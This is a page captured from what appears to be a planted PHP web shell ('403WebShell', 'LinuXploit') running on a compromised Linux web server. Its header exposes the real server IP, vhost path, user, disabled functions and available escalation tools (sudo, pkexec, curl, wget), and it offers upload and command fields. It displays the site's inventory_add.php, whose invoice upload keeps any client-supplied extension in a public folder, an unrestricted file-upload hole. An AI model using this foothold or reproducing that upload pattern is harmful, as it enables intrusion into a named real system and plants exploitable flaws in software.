Uname:Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 3.111.61.48  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.2.31
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/vhost/itms.arukustech.com/public/api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhost/itms.arukustech.com/public/api/inventory_add.php
<?php
header("Content-Type: application/json");

error_reporting(E_ALL);
ini_set('display_errors', 1);

require_once __DIR__ . '/../../app/db.php';
require_once __DIR__ . '/../../app/helpers/auth.php';
require_once __DIR__ . '/../../app/helpers/activity_logger.php';

auth();
$pdo = db();

/* =============================
   VALIDATE INPUT
============================= */
$category_id   = $_POST["category_id"] ?? null;
$item_name     = trim($_POST["item_name"] ?? '');
$brand         = $_POST["brand"] ?? null;
$model         = $_POST["model"] ?? null;
$serial_no     = $_POST["serial_no"] ?? null;
$purchase_date = $_POST["purchase_date"] ?? null;
$invoice_no    = $_POST["invoice_no"] ?? null;
$warranty_date = $_POST["warranty_date"] ?? null;
$cost          = $_POST["cost"] ?? null;

if (!$category_id || !$item_name) {
    echo json_encode([
        "status" => "error",
        "message" => "Missing required fields"
    ]);
    exit;
}

try {
    /* =============================
       BEGIN TRANSACTION
    ============================= */
    $pdo->beginTransaction();

    /* STEP 1: FETCH CATEGORY */
    $cat = $pdo->prepare("
        SELECT asset_prefix, next_number 
        FROM inv_categories 
        WHERE id = ?
        FOR UPDATE
    ");
    $cat->execute([$category_id]);
    $category = $cat->fetch(PDO::FETCH_ASSOC);

    if (!$category) {
        throw new Exception("Invalid category");
    }

    $asset_code = $category['asset_prefix']
        . str_pad($category['next_number'], 4, "0", STR_PAD_LEFT);

    /* STEP 2: INSERT INVENTORY */
    $stmt = $pdo->prepare("
        INSERT INTO inventory_items
        (
            category_id, item_name, brand, model, serial_no,
            purchase_date, invoice_no, warranty_date,
            cost, asset_code, status
        )
        VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, 'available')
    ");

    $stmt->execute([
        $category_id,
        $item_name,
        $brand,
        $model,
        $serial_no,
        $purchase_date,
        $invoice_no,
        $warranty_date,
        $cost,
        $asset_code
    ]);

    $item_id = $pdo->lastInsertId();

    /* STEP 3: OPTIONAL INVOICE UPLOAD */
    $invoice_path = null;

    if (!empty($_FILES['invoice_file']['name'])) {

        $uploadDir = __DIR__ . "/../../public/uploads/invoices/$item_id/";
        if (!is_dir($uploadDir)) {
            mkdir($uploadDir, 0775, true);
        }

        $ext  = strtolower(pathinfo($_FILES['invoice_file']['name'], PATHINFO_EXTENSION));
        $file = "invoice_" . time() . "." . $ext;

        if (!move_uploaded_file($_FILES['invoice_file']['tmp_name'], $uploadDir . $file)) {
            throw new Exception("Invoice upload failed");
        }

        $invoice_path = "/uploads/invoices/$item_id/$file";

        $pdo->prepare("
            UPDATE inventory_items 
            SET invoice_file = ? 
            WHERE id = ?
        ")->execute([$invoice_path, $item_id]);
    }

    /* STEP 4: UPDATE CATEGORY COUNTER */
    $pdo->prepare("
        UPDATE inv_categories 
        SET next_number = next_number + 1 
        WHERE id = ?
    ")->execute([$category_id]);

    /* STEP 5: ACTIVITY LOG */
    logActivity(
        "Inventory Added",
        "Item: {$item_name}, Asset Code: {$asset_code}"
    );

    /* COMMIT */
    $pdo->commit();

    echo json_encode([
        "status"       => "success",
        "asset_code"   => $asset_code,
        "invoice_file" => $invoice_path
    ]);
    exit;

} catch (Exception $e) {

    if ($pdo->inTransaction()) {
        $pdo->rollBack();
    }

    echo json_encode([
        "status"  => "error",
        "message" => $e->getMessage()
    ]);
    exit;
}

Youez - 2016 - github.com/yon3zu
LinuXploit